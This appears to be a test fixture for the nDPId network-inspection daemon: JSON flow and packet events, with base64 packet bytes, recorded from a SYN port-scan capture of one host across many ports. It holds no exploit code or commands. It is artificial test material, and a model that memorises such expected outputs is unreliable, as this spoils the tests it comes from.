-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"synscan.pcap","alias":"nDPId-test","flow_id":349,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/AsAADIGGmesEAAIQA2GNIzSCdrdUoMYAAAAAGACDAAitQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":356,"source":"synscan.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2046,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":356,"source":"synscan.pcap","alias":"nDPId-test","flow_id":350,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsgb0AADIGlLWsEAAIQA2GNIzSB\/7dUoMYAAAAAGACDAAkkQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":357,"source":"synscan.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":357,"source":"synscan.pcap","alias":"nDPId-test","flow_id":351,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAssgsAAC4GaGesEAAIQA2GNIzSDZTdUoMYAAAAAGACDAAe+wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"synscan.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2811,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"synscan.pcap","alias":"nDPId-test","flow_id":352,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAspfEAACcGe4GsEAAIQA2GNIzSCvvdUoMYAAAAAGACEAAdlAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":359,"source":"synscan.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"synscan.pcap","alias":"nDPId-test","flow_id":353,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsV3wAADYGuvasEAAIQA2GNIzSECHdUoMYAAAAAGACDAAcbgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":360,"source":"synscan.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"synscan.pcap","alias":"nDPId-test","flow_id":354,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsJLYAADoG6bysEAAIQA2GNIzSPoHdUoMYAAAAAGACDADuDQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":361,"source":"synscan.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"synscan.pcap","alias":"nDPId-test","flow_id":355,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAs2BIAADkGN2CsEAAIQA2GNIzSB9HdUoMYAAAAAGACCAAovgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":362,"source":"synscan.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"synscan.pcap","alias":"nDPId-test","flow_id":356,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsipYAACcGltysEAAIQA2GNIzSFf\/dUoMYAAAAAGACEAASkAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":363,"source":"synscan.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058781,"flow_last_seen":1278275058781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058781,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3827,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"synscan.pcap","alias":"nDPId-test","flow_id":357,"flow_packet_id":1,"flow_last_seen":1278275058781,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058781,"pkt":"ACYLMQczACWzv5HuCABFAAAs7gYAACcGM2ysEAAIQA2GNIzSDvPdUoMYAAAAAGACEAAZnAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":364,"source":"synscan.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058781,"flow_last_seen":1278275058781,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058781,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3809,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"synscan.pcap","alias":"nDPId-test","flow_id":358,"flow_packet_id":1,"flow_last_seen":1278275058781,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058781,"pkt":"ACYLMQczACWzv5HuCABFAAAssBUAADsGXV2sEAAIQA2GNIzSDuHdUoMYAAAAAGACEAAZrgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":365,"source":"synscan.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5963,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"synscan.pcap","alias":"nDPId-test","flow_id":359,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsB84AADoGBqWsEAAIQA2GNIzTF0vdU4MZAAAAAGACDAAVQQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"synscan.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"synscan.pcap","alias":"nDPId-test","flow_id":360,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAs9uYAADUGHIysEAAIQA2GNIzTTv7dU4MZAAAAAGACCADhjQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"synscan.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":48080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"synscan.pcap","alias":"nDPId-test","flow_id":361,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsaisAAC8Gr0esEAAIQA2GNIzTu9DdU4MZAAAAAGACEABsuwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":368,"source":"synscan.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"synscan.pcap","alias":"nDPId-test","flow_id":362,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsoicAADgGbkusEAAIQA2GNIzTB+TdU4MZAAAAAGACBAAsqAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":369,"source":"synscan.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":369,"source":"synscan.pcap","alias":"nDPId-test","flow_id":363,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAs5qoAADYGK8isEAAIQA2GNIzTE9jdU4MZAAAAAGACDAAYtAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":370,"source":"synscan.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"synscan.pcap","alias":"nDPId-test","flow_id":364,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsswIAACsGanCsEAAIQA2GNIzTFGXdU4MZAAAAAGACEAAUJwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":371,"source":"synscan.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3737,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"synscan.pcap","alias":"nDPId-test","flow_id":365,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAs+xQAACsGIl6sEAAIQA2GNIzTDpndU4MZAAAAAGACEAAZ8wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":372,"source":"synscan.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3493,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"synscan.pcap","alias":"nDPId-test","flow_id":366,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsrwkAAC8GammsEAAIQA2GNIzTDaXdU4MZAAAAAGACEAAa5wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":373,"source":"synscan.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"synscan.pcap","alias":"nDPId-test","flow_id":367,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAseJEAADcGmOGsEAAIQA2GNIzTD6bdU4MZAAAAAGACEAAY5gAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":374,"source":"synscan.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"synscan.pcap","alias":"nDPId-test","flow_id":368,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAse3UAADsGkf2sEAAIQA2GNIzTzoXdU4MZAAAAAGACEABaBgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":375,"source":"synscan.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"synscan.pcap","alias":"nDPId-test","flow_id":369,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/eEAAC0GHZGsEAAIQA2GNIzTEyPdU4MZAAAAAGACCAAdaQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":376,"source":"synscan.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"synscan.pcap","alias":"nDPId-test","flow_id":370,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsro4AACgGceSsEAAIQA2GNIzSrdXdUoMYAAAAAGACBACGuQAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":377,"source":"synscan.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"synscan.pcap","alias":"nDPId-test","flow_id":371,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsChEAACcGF2KsEAAIQA2GNIzSAAndUoMYAAAAAGACEAAohgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":378,"source":"synscan.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"synscan.pcap","alias":"nDPId-test","flow_id":372,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsd34AAC0Go\/SsEAAIQA2GNIzSBTDdUoMYAAAAAGACCAArXwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":379,"source":"synscan.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1166,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"synscan.pcap","alias":"nDPId-test","flow_id":373,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsoIAAADgGb\/KsEAAIQA2GNIzSBI7dUoMYAAAAAGACBAAwAQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":380,"source":"synscan.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 